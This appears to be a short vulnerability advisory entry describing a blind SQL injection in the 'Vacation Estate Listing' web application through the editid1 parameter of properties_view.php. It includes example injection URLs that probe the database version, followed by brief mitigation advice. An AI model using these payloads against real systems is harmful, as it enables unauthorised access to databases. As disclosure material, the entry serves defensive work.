vendor:
Vacation Estate Listing
by:
x0r
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Vacation Estate Listing
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Vacation Estate Listing Blind Sql
The Vacation Estate Listing Blind SQL Injection vulnerability allows an attacker to inject malicious SQL queries into the vulnerable application. This can be done by manipulating the 'editid1' parameter of the 'properties_view.php' page. An attacker can use the substring() function to check the version of the database server. For example, 'properties_view.php?editid1=2 and substring(@@version,1,1)=4' and 'properties_view.php?editid1=2 and substring(@@version,1,1)=5' can be used to check the version of the database server.
Mitigation:
The application should be tested for SQL injection vulnerabilities and any vulnerable parameters should be sanitized. Input validation should be implemented to prevent malicious input from being accepted by the application.
